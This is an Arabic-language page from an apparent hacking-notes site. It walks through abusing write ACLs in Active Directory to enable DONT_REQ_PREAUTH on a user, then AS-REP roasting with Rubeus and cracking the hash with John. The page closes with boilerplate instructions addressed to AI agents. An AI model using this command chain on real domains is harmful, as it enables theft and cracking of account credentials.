> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/active-directory/kerberos/enable-as-rep-vulnerability-via-acl.md).

# تمكين ثغرة AS-REP عبر ACL

### المبدأ

في بعض الحالات، لا يملك المستخدم `لا يتطلب المصادقة المسبقة لـ Kerberos` الخيار.

ولكن إذا كانت لدينا صلاحيات الكتابة على هذا المستخدم، على سبيل المثال:

```bash
GenericAll
GenericWrite
WriteAllProperties
```

يمكننا تعديل السمة الخاصة به `userAccountControl`.

<figure><img src="/files/9926b3cde205b219e38dade5ca350de8da85d5a7" alt=""><figcaption></figcaption></figure>

### مثال باستخدام `astrid.niki`

المستخدم `user1` لديه إذن كتابة على:

```bash
astrid.niki
```

ثم نقوم بتفعيل `DONT_REQ_PREAUTH` الخيار باستخدام PowerView:

{% code overflow="wrap" %}

```powershell
Set-DomainObject -Identity astrid.niki -XOR @{useraccountcontrol=4194304}
```

{% endcode %}

<figure><img src="/files/5e2a4f5c5c518c031fccae7450c024c8a9894d6f" alt=""><figcaption></figcaption></figure>

### إعادة بدء AS-REP Roasting

بعد التعديل، يظهر المستخدم في النتائج:

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asreproast /format:john /outfile:hash.john
```

{% endcode %}

<figure><img src="/files/5f584efef455c959d44cb2faef4d0f3893ea41fb" alt=""><figcaption></figcaption></figure>

ثم نقوم بكسر الهاش:

{% code overflow="wrap" %}

```bash
john hash
```

{% endcode %}

<figure><img src="/files/1869875674d92ed7b6845ed3c3ea544d3ca7f228" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/active-directory/kerberos/enable-as-rep-vulnerability-via-acl.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
